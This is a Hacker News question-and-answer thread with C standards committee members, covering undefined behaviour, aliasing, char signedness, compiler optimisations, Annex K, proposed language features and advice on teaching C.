What would you say to people who claim that writing "secure C code" is impossible [not me but I'm curious what you all think]?


I'd ask them if they really meant "impossible" or just "harder than I wish it was".

I've typically found that the tradeoffs between security, performance, and implementation efforts are usually more to blame for why writing secure C code is a challenge. There are a ton of tools out there to help with writing secure code (compiler diagnostics, secure coding standards, static analyzers, fuzzers, sanitizers, etc), but you need to use all the tools at your disposal (instead of only a single source of security) which adds implementation cost and sometimes runtime overhead that needs to be balanced against shipping a product.

This isn't to suggest that the language itself doesn't have sharp edges that would be nice to smooth over, though!


I'm teaching C to high schoolers as their first language, which is quite the adventure. Do you have any good advice or resources on how to introduce the way C treats the function stack and heap allocated memory? Most of my students struggle (naturally) with making sense of function scoped identifiers and pass-by-value semantics.


This service has been designed to try out small self-contained C examples online (in a manner reminiscent of Compiler Explorer):

https://taas.trust-in-soft.com/tsnippet/

One advantage is that it identifies a LOT of undefined behaviors during execution for which traditional compilation and execution only give puzzling results.

One drawback is that some of the undefined behaviors it identifies are obscure, and for others the message may be unusual. For instance, using a standard function without including the appropriate header may result in a warning about the mismatch between the type in the header and the type of the arguments the standard function was applied to after arguments promotions.

Overall, you may still find it useful for teaching.


Thanks! Definitely an interesting tool. Two of my students are fascinated by the idea of undefined behavior right now (having run into it in practice; the idea that off-by-one errors sometimes crash their program and sometimes behave "normally" is really odd to them), so I'll point them at this to play with.


Curious what were the requirements to select C as a first high school language over many other choices? I imagine there's a balance of practicality (after the class), and then the usual questions about tooling, sharp edges, and ease of learning.


It's a three year rotation: Python, C (Unix), C (Arduino). My goal with the class is to teach ideas that will stand the test of time. C (and Unix) certainly fit that bill.

Happily, the tooling is the easiest part. Every student has a rasberry-pi running debian, no mouse, no window server, and no extraneous software. You can spool kids up on a nano-based C toolchain in one class period with remarkably few sharp edges. There's even some fun accidental learning the first time they nano their executable file.


Neat! I think your choice of C and Python as the languages to be taught is very right. The idea of showing the use of C in both Desktop/Server and Embedded environments has long been the approach i had advocated. C is truly the de-facto "universal" language and students should be made aware of it from the start.

I would suggest the following additions;

* The Arduino "language" is C++. Use this as a gentle introduction to C++ as a "better C". From there you can move on to proper C++ (do NOT teach "Modern C++" in the beginning). The intent is to show how "C + some syntactic sugar for expressing abstractions" is quite powerful and that is what is C++. This should prepare the students to embark on a proper study of C++.

* Instead of using the Arduino "language+library" through the IDE, show them how to use the same GNU gcc toolchain to program the MCU directly in C. See Make: AVR programming by Elliot Williams for details. This teaches the students the idea of a "cross compiler toolchain" and all other related matters from first principles.


C++ is the language with which I’m most comfortable, having used it professionally for the better part of a decade. I’ve gone back and forth on using it in HS. It’s abstractions are so opaque if you don’t already have a well developed model of programming.

For the arduino, I’m really interested in teaching control systems. So we will start with finite state machines and go from there to implementing PID controllers. I’m intrigued by the idea of avoiding the IDE, so will totally pick up that book!


Everybody seems to draw pictures of the raw memory (word-oriented) data.


I've been doing the same! It certainly helps for strings. Pointer block diagrams (like K&R use) seem to help too. Mostly what melts their brains is the idea that an identifier can be "in two places at once" - for example, you can have a variable x declared in some scope and a function one of whose arguments is named x, and those are two different things.


Try explaining the concept of "scope", starting with nested blocks. It does require some practice. I suggest not unnecessarily reusing identifiers associated with different objects.


Thanks!


I suggest The C Companion by Allen Holub for getting an idea of "behind the scenes".

For a more modern look, i suggest Computer Systems: A Programmer's Perspective by Bryant and O'Halloran

Of course, you would need to pick and adapt the content for your students.


Have you given ada language a thought ? Also there are lot of competition your students can take part in https://www.makewithada.org/


I haven’t - is there a good tool chain you’d recommend me checking out? What’s the enduring idea in ada?


Sorry i didn't see notification of your reply. Here is tool chain from ada they have IDE also if you want

https://www.adacore.com/community


And some link to tutorials https://learn.adacore.com/


char effectively behaves as a signed type, making it unsuitable for binary operations (e.g. UTF-8 manipulation). I/O functions deal with char pointers, so using unsigned type like uint8_t requires casting back and forth. Is there any way out of this problem, and am I already breaking the aliasing rules with that cast?


Plain char is either signed (same representation as signed char) or unsigned (same representation as unsigned char), depending on the implementation.

Yes, there are real-world implementations where plain char is unsigned.


Casting between the three character types is safe and doesn't violate aliasing rules. In addition, objects of all types can be accessed by lvalues of any of the three character types (though unsigned char is recommended), so there's no problem there either.

I/O functions that take a plain char* are designed to interoperate with char arrays and strings, so passing in unsigned or signed char is a sign that they aren't being used as intended. (Functions that traffic in binary data like fread/fwrite should take void*).


There are no aliasing differences between uint8_t and char as far as I know.


In practice not. In theory, it’s implementation-defined whether yhere are differences.


At least from what I've heard that's because stdint values are optional.

6.2.5p17 The three types char, signed char, and unsigned char are collectively called the character types. The implementation shall define char to have the same range, representation, and behavior as either signed char or unsigned char. 48)

and

5.2.4.2.1 says that width of char, signed char and unsigned char are the same (8).


I don't think it's anything to do with uint8_t being optional. It's because a char might have more than 8 bits.


A conforming implementation could extend the language with an 8-bit type __nonaliasingbyte which has no special aliasing privileges, and define uint8_t as being synonymous with that type.

On the other hand, the Standard should never have given character types special aliasing rules to begin with. Such rules would have been unnecessary if the Standard had noted that an access to an lvalue which is freshly visibly derived from another is an access to the lvalue from which it is derived. The question of whether a compiler recognizes a particular lvalue as "freshly visibly derived" from another is a Quality of Implementation issue outside the Standard's jurisdiction.


Hi Team "C",

I am a beginner level programmer and C is not one of the languages for which I have even bothers to write a "hello world" for. That is my level.

As the people that "runs" C, why do we need C? Forget the legacy systems. With fancy languages like Go, Rust, Elixir, Python and the millions others. Of course, the "offsprings" like C++ & C#.

What was the use case that C was designed for (I have read from sources like Wikipedia, would love to hear straight from source)? In 2020, how relevant is C? If someone is going to write a system/application today, why consider C? Do you think, C will be relevant in 5 yrs (I know 1 yr in computing is like 10 yrs for humans)? With all your combined experience in computing over the years and as the members of a team that is guiding a valuable thing like "C". What is your advice/wisdom/thought for us?


How close C Standard Committee works with Linux Kernel Developers? Is Linux Kernel development influence on C standard?


There's not an official collaboration between the committee and the kernel developers (that I'm aware of), but we do have people on the committee who need to support Linux kernel development (such as GCC maintainers), so there is some level of indirect influence there.


One feature of C which I do not use often is enums. Support for constants beyond the range of an int is not portable. And I also try to avoid is putting enums inside structs, because there is no portable way to enforce the size or the alignment of the enum's base type.

Will this be addressed in future revisions of the C standard?


Is there any new programming language that you particularly love? Do you like the way programming is evolving?


As a member of the development team for a C static analyzer, I use OCaml, which is also my favorite programming language, but that is because I'm from the generation in which it was the new thing (I learnt it when it had the same level of maturity as Rust, at a time when Rust didn't exist). It helps that it's perfect for writing compilers and static analyzers.

There are a lot of problems that seem a good match for Rust, and Rust is first in my list of programming languages I will never find the time to learn but wish I could.


Why won't you ever find time? It should only take a good 20 hours of reading and playing with code before you start to grok it.


I spent the early part of my career bragging about how many programming languages I knew, and the later part of my career complaining about how I don't know any of them well enough.


I certainly wouldn't go for quantity there, but if you really want to learn Rust you should. It brings some groundbreaking new ideas to programming and is more than "just another language".


Curious what the committee members think of the new competitors to C, e.g. Go, Rust, and Zig. Any comments?


go isnt a competitor to c


F-Secure apparently thinks otherwise,

https://www.f-secure.com/en/consulting/foundry/usb-armory

As does Google,

https://github.com/google/gvisor

https://github.com/google/gapid

Naturally if one is talking about specific uses cases like IoT with a couple of KBs, MISRA-C, or UNIX kernels, then yes Go is not a competitor.


Rather than trying to come up with "compromise aliasing rules", the Standard needs to recognize that different tasks require different features, and allowing all possible optimization opportunities that would be useful for some tasks would make an implementation totally unsuitable for others.

I would suggest that the Standard define directives to demand three modes, with the proviso that a compiler may reject code which demands a mode it cannot accommodate:

1. clang/gcc mode, which would be adjusted to match the way clang and gcc actually behave, as well as anything they want to do but their interpretation of the Standard woudln't allow.

2. precise mode, which behaves as though all loads and stores of objects whose address are taken behave according to a precise memory-based abstraction

3. sequence-based mode, which would allow compilers to hoist, defer, consolidate, and eliminate loads and stores in cases where they honor data dependencies that are visible in the code sequence, but would require that compilers recognize visible dependencies which clang and gcc presently ignore, and would also require that the definition of "based on" used by "restrict" recognize that any pointer formed by adding or subtracting an integer from another pointer by recognized as "at least potentially based on" the former, even in corner cases where clang and gcc would ignore that.

Recognizing mode #1 would avoid allow clang and gcc to keep using their aliasing logic with programs that can tolerate it. Mode #2 would ensure that all programs that have trouble with that logic could have defined behavior by adding a directive demanding it. Mode #3 would allow most of the same useful optimizations as mode #1, but work with a wide range of programs that would presently require `-fno-strict-aliasing`.

If one recognizes the need for different modes, the effort required to describe all three modes would be tractable, compared to the obviously-intractable problem of reaching consensus about how one mode that would need to serve all purposes.


- Which differences between the C abstract machine and actual modern CPUs/hardware have proven most difficult to deal with in the language?

- Are you planning any addition regarding modeling of how modern CPUs work (e.g. pipelines, branches, speculative execution, cache lines, etc)?

PS: Thank you for doing this!


> - Which differences between the C abstract machine and actual modern CPUs/hardware have proven most difficult to deal with in the language?

For me, I think it's 'volatile' because, by its nature, you can't describe what it means in the abstract machine very well. For instance, consider a proposal to add something like a "secure clear" function for clearing out sensitive data. The natural inclination is to pretend that data is volatile so the optimizer won't dead-code strip your secure clear function call, but that leaves questions about things like cache lines, distributed memory, etc.

> - Are you planning any addition regarding modeling of how modern CPUs work (e.g. pipelines, branches, speculative execution, cache lines, etc)?

Maybe? ;-) We tend to talk about features at a higher level of abstraction than the hardware because hardware changes at such a rapid pace compared to the standards process. So we largely leave hardware-specific considerations as a matter of QoI for implementers.

However, that doesn't mean we wouldn't consider proposals for more concrete things like a defensive attribute to help mitigate speculative execution attacks.


Is there a rule that any new proposals must already be a feature in an existing major implementation?


Yes, the C2x charter has this requirement: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2086.htm


Thanks, so from "Only those features that have a history and are in common use by a commercial implementation should be considered", this precludes stuff that may only exist in clang, gcc, glibc, etc.? If so, why?


I wouldn't read into "commercial" there, I think we meant "production-quality" instead. (We should fix that!)

Basically, we prefer seeing features that real users have used as opposed to an experimental branch of a compiler that doesn't have usage experience. Knowing it can be implemented is one thing, but knowing users want to use it is more compelling.


You could interpret that as "in common use by a commercial[ly used] implementation".


(Not one of the OPs:) Wasn't C11 Annex K, the notoriously failed bounds-checking interfaces, a example of not having an existing implementation?


Annex K had an existing implementation from Microsoft. It wasn't a fully conforming implementation when C11 shipped, however (the specification drifted apart from the initial implementation).


Hello,

First off thank you so much for taking the time to answer questions.

As a new programmer starting with C I am trying to learn how to go from a beginner to an intermediate any recommendations of projects to help learn C?

It is difficult for me to find projects that I see are "valuable" for a lack of a better term.

Thank you!


One possibility is to modify some existing program to include an additional new feature. You should soon develop a sense for what works well versus what causes problems.


Is there a chance to ever see C++-template-like features appear in C?

For instance, a lot of redundant code (or ugly macro business) could be neatly replaced by function templates. Even just template functions with only POD values allowed would be a great readability improvement.


It's already there. It's called C++ templates


A few proposals:

Why not mandate a warning every time the compiler detects and makes use of UB? It would solve SO many issues. If you are looking to improve security of C programs, then letting the user know what the compiler does should be number one.

Try to convert as many UB's to Platform specific, as possible would also be a big help.

I would love to see native vector types. Its time. Vector types are now more common in hardware then float was when it was included in the C spec. Time to make it a native type. Hoping the compiler does the vectorization for you is not good enough.

Allow for more then one break.

for(i = 0; i < n; i++) for(j = 0; j < n; j++) if(array[i][j] == x) break break;

is equal to:

for(i = 0; i < n; i++) for(j = 0; j < n; j++) if(array[i][j] == x) goto found; found :


> Why not mandate a warning every time the compiler detects and makes use of UB? It would solve SO many issues.

Because that's hardly ever what happens, except when it actually does, and compilers do an increasingly good job of issuing diagnostics in that case. If you actually mandated it, no compiler today would come close to being standards compliant. This comes close to making the language unimplementable.

The most common issue with UB and optimizations is not that "compiler detects UB and does something with it," it's that compiler analyzes and optimizes code with the assumption that UB doesn't actually happen. It doesn't know whether it does (and in general, it is impossible to tell whether it would happen -- it's something that might or might not happen at run time, and proving it one way or another amounts to solving the halting problem), it just assumes it doesn't.

And if one mandated compilers to report every time they make an optimization that is valid under the assumption that the program is well behaved, then you would never finish reading compiler output. Or you would turn off optimizations.


They need to do better then remove NULL checks silently. You can read all about Linus rants on this. Every time the compiler breaks things they blame the C standard for letting them do what ever. Thats whats wrong with C today. The C standard hasn't put its foot down.


I want my compiler to remove redundant checks (without any noise), and that is why I pass it an optimization flag. If you don't want such optimizations, then maybe you should not ask the compiler to make them.


This attitude is terrible! Its an attitude that says that unless you know exactly every pit fall in the language by heart you have no place writing code. I guess you dont use a debugger either because you never write bugs right? And you think that every software that helps the user is for noobs right?

There is an endless list of bugs that have been produced by very competent C programmers, because the compiler has silently removed things for some very shaky reasons.


Huh? I just want performant code. That's why I write C, and that's why I use an optimizing compiler, and that's why I ask my compiler to optimize.

I also want to write code that is reasonably generic. Thus, it will have checks and branches that cover important corner cases; they are required for completeness and correctness. But very often, all of these checks turn out to be redundant in a specific context, and an optimizing compiler can figure it out, and eliminate these checks for me.

So I don't manually need to go and write two or three versions of each function like do_foo and assume_x_is_not_null_and_do_foo and assume_y_is_less_than_int_max_minus_sizeof_z_and_do_foo and make damn sure not to call the wrong one.

I just write one version, with the right checks in place, and if after macro expansion, inlining, range analysis, common subexpression elimination, and other inference from context, with C's semantics at hand, the compiler can figure out that some of these checks are redundant, then it will optimize them out.

I ask for it, and I'm glad compiler developers deliver it. You don't need to ask for it. Just turn off these optimizations (or, rather, don't enable them) if you prefer slow and redundant code.


Why can't the following be a warning?

    int foo(bar *x)
    {
      x->blah = 0;
      if (x == NULL) ... 
      ...
    }
And produce something like "NULL check removed---pointer used before check"?


In theory? No reason.

In practice it's a special case of a more widely applicable optimization where you actually do want to remove redundant checks. So someone has to go out of their way to figure out a rule that makes the compiler warn but only in cases where a human reader finds the optimization surprising and undesirable. It's a fuzzy thing and can easily lead to lots of false positives and noise (and more whining because it didn't warn in a situation that someone considered surprising).

I think that kind of logic can easily become a support & maintenance nightmare, so I'm not surprised that compiler developers take their time and are conservative when it comes to adding such things. I would probably just ask you to either stop dereferencing NULL pointers, or turn off the optimization if you want to dereference NULL pointers and eat your cake too.


This is a very naive view of how C works in reality. Take this example:

if(a == NULL) log_error_and_exit(); *a = 0;

Compilers, have been known to silently remove the NULL check in code like this. Does that seem clear to you? Is this your definition of compilers delivering for you? NULL checks dont just get removed in cases where you NULL check the same value multiple times, they get removed for some very non obvious reasons.

This is why the Linux kernel now needs to be built with the compiler option -fdelete-null-pointer-checks

Compilers need to start communicating what they are doing, and I think the C spec should encourage that.


You probably mean -fno-delete-null-pointer-checks?


Most compilers will no longer do this, FWIW.


A multiple-level break is a good idea, but I think that Java's labeled break is a better way to do it:

    find_in_array_loop:
    for(i = 0; i < n; i++)
        for(j = 0; j < n; j++)
            if(array[i][j] == x)
                break find_in_array_loop;


Will you ever add / have you considered adding sane formatting options for fixed length variables in printf? Say %u32 or %s64 ?

Have you considered adding access to structure members by index or by string name? Have you considered dynamic structures?


> Will you ever add / have you considered adding sane formatting options for fixed length variables in printf? Say %u32 or %s64 ?

I'm not certain about the historical answer to this, but I do know that we're currently considering a proposal to introduce an exact bit-width integer type '_ExtInt(N)' to the language, and how to handle format specifiers for it is part of those discussions, so we are considering some changes in this area.

> Have you considered adding access to structure members by index or by string name? Have you considered dynamic structures?

I don't recall seeing any such proposals. I'm not familiar with the term "dynamic structures", what do you have in mind there?


>and how to handle format specifiers for it is part of those discussions, so we are considering some changes in this area.

Please, please, please pick short and descriptive format specifiers, like %[suf]\d+, ie

  s64 v=somenumber;
  printf("%s64\n", v);
_ExtInt(N) and PRIx64 etc look absolutely horrid. u?int\d+_t are also really bad, it would be great to have just [suf]\d+ as types, where \d+ is 8, 16, 32, 64 for [us] and 32 and 64 for f.

>what do you have in mind there?

Say like VLAs but structures with members that are dynamically defined and used.


> Please, please, please pick short and descriptive format specifiers, like %[su]\d+, ie

That's my personal preference as well. Using the PRI macros always makes me feel sad.

> Say like VLAs but structures with members that are dynamically defined and used.

Ah, no, I don't recall any proposals along those lines. It's an interesting idea, and I'd be curious what the runtime performance characteristics would be vs what kind of new coding patterns would emerge that you couldn't do previously though!


First, I agree on the PRI macros. I refuse to use them.

Stucture member access by name is useful. It's slow, but it doesn't affect code that isn't using the feature. The worst runtime issue is that the runtime support requirement grows. For example, libgcc would gain a few functions.

We can do it today with awkward code, sometimes involving hacks that are outside the C language. Implementations vary by how much they hide what is going on. When I implemented libproc.so for Linux, I made two implementations. The high-performance one used a perfect hash table that was generated by gperf and then hand-edited. Name look-up would do the hash, index into an array of structs, compare the name for a match, and then use gcc's computed goto extension to jump to code that would handle the struct member. Had I not been also parsing the data in various distinct ways, I might have used an offsetof() macro to let generic code fill in the struct fields. The other implementation I made, with lower performance, used bsearch on a sorted array.

Dynamically defined struct members are also useful, but even slower and with even more overhead. Again though, I don't think that other code would be affected beyond the growth of the compiler's libgcc equivalent.

Seeing what I just wrote above, the computed goto extension is more important. It's great for any kind of table look-up that needs code to run. Emulators use it a lot, and would use it much more if it were in the C standard.


Just FYI -- there are macros for the fixed-length types, e.g.:

    printf("U32: %" PRIu23 ", U64: " PRId64, (uint32_t)1, (int64_t)2);
Perhaps not as handy as %u32 or %s64, but it's here.


Yeah, and the issue is with those macros exactly. It makes writing code on them really damn annoying and it relies on C constant string concatenation, breaks the flow quite a lot.


Which is why I usually convert to intmax_t or uintmax_t, or to some type that I know is wide enough:

    uint64_t foo = ...;
    printf("foo = %ju\n", (uintmax_t)foo);
    /* OR */
    printf("foo = %llu\n", (unsigned long long)foo);


I think what emilfihlman means is those macros are hard to remember and clumsy to use - which you might agree with when I point out you made two mistakes in two usages :-p


As experts, where do you see C going? In particular, given the many languages now out there built on decades of learnings from C, where will C have unique strengths? What projects starting today and hoping to run for 20 years should definitely pick C?


I don't really see C going anywhere. It's not going away, and it's not going to evolve into Java. It's going to remain especially useful for memory constrained and performance critical applications such as IoT and embedded.


That sounds reasonable, but the resource-constrained space seems to me to be an ever-shrinking share of the field. So is it fair to say you see C becoming a specialist niche language going forward?


Thank you for taking time to take questions!

Have you ever considered or will you consider deprecating char, int, long, (s)size_t, float, double and etc in favour of specific length types?

Will you ever add / have you considered adding [su]\d+ and f\d+ as synonyms for those mentioned stdint.h?

Since char is signed on most platforms, arm eabi being an exception and even there it's really just a matter of compile time flags, will you ever just drop char from being able to be either and just say it's signed, as int is also signed?

Will you ever define / have you considered defining signed overflow behaviour?


I don't think we'll ever deprecate char, int, long, float, double, or size_t. ssize_t is not part of the C Standard, and hopefully never will be as it is a bit of an abomination. The main driver behind the evolution of the C Standard is not to break existing code written in C, because the world largely runs on C programs.

C does provide fixed width types like uint8_t, uint16_t, uint32_t, and uint64_t. These are optional types because they can't be implemented on implementations that don't have the appropriate word sizes. We also have required types such as

uint_least16_t uint_least32_t uint_least64_t uint_least8_t


Those types should not be optional. CHAR_BIT needs to be 8. It is clearly possible to implement the types even on a 6502 or Alpha. From the early days of pre-ANSI C, the language supported types for which the hardware did not have appropriate word sizes. There was a 32-bit long on the 16-bit PDP-11 hardware.

I would go beyond that, requiring all sizes that are a multiple of 8 bits from 8-bit through 512-bit. This better supports cryptographic keys and vector registers.


> CHAR_BIT needs to be 8.

Why?


Everything breaks if it isn't.

I was on an OS development team in the 1990s. We were using the SHARC DSP, which was naturally a word-addressed chip. Endianness didn't exist in hardware, since everything was whatever size (32, 40, or 48 bits) you had on the other end of the bus. Adding 1 to a hardware pointer would move by 1 bus width. The chip vendor thought that CHAR_BIT could be 32 and sizeof(long) could be 1.

We couldn't ship it that way. Customers wanted to run real-world source code and they wanted to employ normal software developers. We hacked up the compiler to rotate data addresses by 2 bits so that we could make CHAR_BIT equal to 8.

That was the 1990s, with an audience of embedded RTOS developers who were willing to put up with almost anything for performance. People are even less forgiving today. If strangely sized char couldn't be a viable product back in the 1990s, it has no chance today. It's dead. CHAR_BIT is 8 and will forever be so.


This was a really interesting and enlightening comment and a small story! Thank you!


>The main driver behind the evolution of the C Standard is not to break existing code written in C, because the world largely runs on C programs.

If not deprecate, then at least make fixed width types as equivalent members to them, ie all char based apis should accept s8 (typedef signed char s8) and all int based apis should accept s32.


Well, there are number of problems with this proposal. For example, if your implementation defines int as a 16-bit type (which is permitted for by the standard) and you pass an int32_t, the value you pass maybe truncated if it is outside of the range of the narrower type. When programming, it is best to match the type of the API of the function you are calling for portability.


Dear god, is the precedence of the "&" operator ever going to be fixed?


I can't imagine it will ever be changed, since this would be a breaking change to the language.


I disagree that this would be a "breaking" change as many people have already resorted to using extra () and such a change might actually may "fix" broken code which makes the reasonable assumption that things like == have a higher-order.

https://ericlippert.com/2020/02/27/hundred-year-mistakes/

int x = 0, y = 1, z = 0;

int r = (x & y) == z; // 1

int s = x & (y == z); // 0

int t = x & y == z; // 0 UGH


If you're using parentheses, as has been recommended for decades, there is no problem. Otherwise, it is likely that such a change would adversely impact previously working code. There just isn't a pressing need to change it.


Besides the fact that its unintuitive and could lead to low-level or hard-to-find bugs?

It seems to me that C would benefit greatly to iron over its many inconsistencies and exactly the kind of thing people expect in new revisions of the language.

Also, I dont see how it would impact previous working code when compilers already do things like allow selections between versions of languages a la C99, C2x, etc. Users could just avoid the new version if they don't feel like changing.


I don't think most users of C want things changing underfoot. Keeping track of all the version combinations is infeasible, especially when you consider that an app and its library packages are likely to have been developed and tested for a variety of environments. To the extent that existing correct code has to be scanned and revised when a new compiler release comes out, one of the primary goals of standardization has failed.


I disagree with your view of standardization - as restricting changes to be additions to the runtime seems pointless as users could easily use other (often more optimized) libraries.

But, I do see the benefit of having a language "frozen in time" which never really changes and can be mastered painlessly without having to refresh on new versions. Perhaps C is special/sacred in this regard.


Hello, just a quick note; I wanted to buy the book so I went to the website and when I picked my country as Canada it started giving me a strange list of provinces (definitely not Canadian) so I abandoned the process for now.


I've asked our Operations Manager to look into this issue. Thanks for bringing this to our attention. We'll get it sorted out. Please email info@nostarch.com so that they can help troubleshoot.


I'll pass this on to the publisher....


Here is a library suggestion: a "m" mode for fopen.

"m" is the same as "w", but does not truncate the file. In POSIX terms, it doesn't add O_TRUNC to the flags.

There is "r+", of course; but "r+" requires that the file exists already. In POSIX terms, "r+" does not include the O_CREAT flag.

fopen("foo", "m") creates the file if it does not exist, and opens it for writing. The stream is positioned at the beginning of the file without truncating it.

We can sort of emulate it with fopen("foo", "a"), then fclose, then open with "r+".


Why is the struct tm* returned by localtime() not thread-local like errno and other similar variables are (at least in implementations)? Do you have any plans to improve calendar support for practical uses?


Both question would get better answers if they were asked to a panel of experts on POSIX (which could including members of the POSIX standardization committee).

For the first one, I can attempt a guess: maybe it was feared that making the result of localtime thread-locale would break some programs? You could build such a program on purpose, although I am not clear how frequently one would write one by accident.

Anyway, localtime_r is the function that one should use if one is concerned by thread-safety. A more likely answer is that no Unix implementation bothered to fix localtime because the proper fix was for programs to call localtime_r.


Hi, I'm 20 years dev and I love C. C is my second language after assembler. A good days with Turbo C with 20 MB hard drive and 8086 without IT marketing and viruses. I working on a real-time reverse-debugger for new programming platform. It's possible to debug C code and prevent NULL and memory exceptions. I create my language based on C and removed all keywords, and it works perfectly. I want to make a gcc backend to my programming language and all features will be available for any C-programs.

How I can find help for this?


I really like the relative simplicity of C compared to C++ and recently wrote a project in C, but eventually rewrote it in C++ for just a few seemingly trivial reasons that nonetheless were important time savers. I'd love to know if the C standard, as can run on GPUs also, will ever evolve to offer:

1) namespaces, so function names don't need to be 30 characters to avoid naming collision

2) guaranteed copy elision or RVO -- provides greater confidence for common idioms and expressivity compared to passing out parameters


Since 1999, a lot of undefined behavior has been added to the language to improve compilers’ ability to optimize. For example, pointer aliasing rules. How have you measured the benefit?


What is your vision of C, its future and its past? What was it supposed to become and did it become that thing? What is it now? What will it involve into in the near and far future?


The C charter and the C committee's job is to standardize existing practice. That means codifying features that emerge as successful in multiple implementations (compilers or libraries), and that are in the overall spirit of the language.


Out of curiosity, if there was anything you could change about C, and not have to worry about breaking existing code or any other practical concern, what would it be, and why?


Back from lunch. Any West Coasters?


When deciding on standardized behavior for C operations or data representation that may favor some hardware over others [1], who argues the side of the various hardware vendors, if they have no members on the standardization committee?

Is it fair to assume that hardware-related decisions occur in an environment where members who are sponsored by vendors argue their employers case, rather an a neutral one?

---

[1] E.g., because some hardware's behavior may more naturally implement the operation.


> When deciding on standardized behavior for C operations or data representation that may favor some hardware over others [1], who argues the side of the various hardware vendors, if they have no members on the standardization committee?

The C committee has a number of implementation vendors on it (GCC, Clang, IBM, Intel, sdcc, etc) and these folks do a good job of speaking up about the hardware they have to support (and in some cases, they're also the hardware vendor). If needed, we will also research hardware from vendors who have no active representation on the committee, but this is usually for more broad changes like "can we require 2's complement?".

> Is it fair to assume that hardware-related decisions occur in an environment where members who are sponsored by vendors argue their employers case, rather an a neutral one?

In my experience, the committee members typically do a good job of differentiating between "this is my opinion" and "this is my employer's opinion" during discussions where that matters. However, at the end of the day, each committee member is there representing some constituency (whether it's themselves or their company) and votes their own conscience.


Thanks for your quick and honest answer.


Is there a way to append/extend a MACRO value ?

For example, I have a arbitrary number of includes, each of them declare a struct that need to be listed later on.

  #define MOD_LIST // start with an empty list

  #include "mod/a.c"
  // MOD_LIST is: a,

  #include "mod/b.c"
  // MOD_LIST is: a,b,
  
  Module modules[] = {
    MOD_LIST
  }


Hi I took an amazing course in college that focused heavily on C. Do you have any recent examples of small side projects you’ve worked on using C?


How about a Sudoku solver? Send me a request via e-mail.


Doug, the email address in your account is private by default, but you can make it public by putting it in the About field of your profile at https://news.ycombinator.com/user?id=DougGwyn.

ender1235, if you don't see an email address there, email hn@ycombinator.com and I'll put you in touch.


Okay, check my About text. I'll soon remove it, to avoid getting a lot of spam.


Why not keep C a simple little language with fast compile times and delegate all "enhancements" (such as 'cleanup') to C++?


From reading all their comments up to now, my feeling is that's exactly their plan.

When asked, "Where do you think C is going?", one of them said, "I don't see it going anywhere." I took that as a good thing, meaning, they're concerned about backward compatibility, compiler performance, and only adding features when there's a wide concensus in implementation - which is a high enough hurdle that avoids the feature bloat of C++.

Overall, I felt the "conservatism" refreshing, to keep the language small.

On the other hand, there are several common feature requests I see in this thread that probably will never be part of the language, since it moves slow relative to other languages.


What is your favorite language other than C and why?


I answered a similar question in another thread: https://news.ycombinator.com/item?id=22866242


another proposal:

    _If, _Ifdef, _Ifndef
inside function macros

for example:

    #ifdef SOME_CONST
    #define WHATEVER(w, h, a, t, e, v, e, r) \
        ... common part ... \
        ... for SOME_CONST ... \
        ... common part continued ...
    #else
    #define WHATEVER(w, h, a, t, e, v, e, r) \
        ... common part ... \
        ... when SOME_CONST not defined ... \
        ... common part continued ...
    #endif
With _Ifdef, the above could be written like:

    #define WHATEVER(w, h, a, t, e, v, e, r) \
    ... common part ... \
    _Ifdef(SOME_CONST, \
        (... for SOME_CONST ...) , \
        (... when SOME_CONST is not defined ...)
    ) \
    ... common part continued ...
With these, one could also do:

    #define FACTORIAL(n) _If(n == 0, 1, (n) * FACTORIAL(n))
    int f = FACTORIAL(6);
turns into: int f = (6) * (5) * (4) * (3) * (2) * (1) * 1;

That would be very useful, I think. It might help with code duplication in function macros.

Maybe _Switch/_Case thereafter.


Why not write is like this:

    #ifdef SOME_CONST
    #define HAS_SOME_CONST \
        ... for SOME_CONST ...
    #else
    #define HAS_SOME_CONST \
        ... when SOME_CONST not defined ...
    #endif
    
    #define WHATEVER(w, h, a, t, e, v, e, r) \
        ... common part ... \
        ... HAS_SOME_CONST ... \
        ... common part continued ...


Modern C language features:

- Why no sized text strings?

- Why is there no hash data type?

- Where's the linked list?

- Why no package management as part of ecosystem?

What is the modern rationale?

Caveats:

- I'm not implying any need for object-orientation (OOP)

- I'm fully aware I can write these myself and can access third party libraries that have each laboriously implemented their own versions.

- I'm interested in why these are not native C constructs in 2020. I appreciate why not in 1980.


Thoughts on Gnome glib, gobject, vala etc?

I tend to use glib for my (academic) code for pretending C is a high-level language. It also seems to make up for implementation-dependent functions in C and many portability issues. Also, IMO, vala > C++.

My question is, really, are there any other tools for high-level C programming and do you know of any disadvantages of the Gnome stack?


I've been waiting for a book on C from No Starch Press, so I'm really excited for this one.

This might not be too deep a question on the C language in regards to this book, but I've been wondering, why did you decide to have an eldritch horror as the book's cover?


It's a longish story, but people do seem to like the cover. We started equating the idea of C == Sea, so we had some early drawings of the robot riding various undersea creatures including a giant squid. I thought that looked overly phallic, so I suggested the robot ride Cthulhu instead, an unofficial mascot of NCC Group.


I like how Cthulhu is shown as kind of a guide for the robot.

The C==Sea brings to mind the book Expert C Programming: Deep C Secrets.


Deep c secrets, a classic.


Wait, they put Cthulhu on the cover of a programming book? I'm buying it.


Has Annex K been axed yet, and if not, why not?


It has not. The C Committee has taken two votes on this, and in each case, the committee has been equally divided. Without a consensus to change the standard, the status quo wins.

Sounds like you don't care for Annex K. What don't you like about it?


I think my complaints are summed up nicely in some of your coauthors' report:

http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1967.htm

(1) runtime constraint handler callbacks are a terrible API.

(2) The additional boilerplate doesn't buy us anything — the user can still specify the wrong size.

(3) The Annex invents a feature out of whole cloth, rather than standardizing existing practices. There are no performant real-world implementations that anyone uses. Microsoft's similar functionality is non-standard.


Have you considered adding multiplexing capability to the standard? It would be great to have a directly portable one.


We would need a specific proposal and assurance that nearly all computers can efficiently provide that service. It is more likely in the POSIX standard.


Though it's interesting that threads were added to the standard. Perhaps though they filled a niche that wasn't as well filled as select/poll/epoll/kqueue/etc had already since pthread api is perhaps harder.


I thought it would be best to standardize just a single thread, which should be the basic unit to be embedded in a good parallel-processing model. However, others prevailed.


What do you think about D language's mode to work as a better C alternative[0]? It seems to even do printf format validation. Can this be the future of C?

[0] https://dlang.org/spec/betterc.html


Not particular to the C language, but what are your opinions on build systems, particularly for the embedded space? There's a couple vendor specific embedded IDEs and toolchains and having to glue together make/cmake files to support all of them can be a pain.


Robert's upcoming book has a survey of a few popular IDEs.


What does the presence or absence of __STDC_ISO_10646__ indicate exactly? I found this part of the C99 spec obscure.

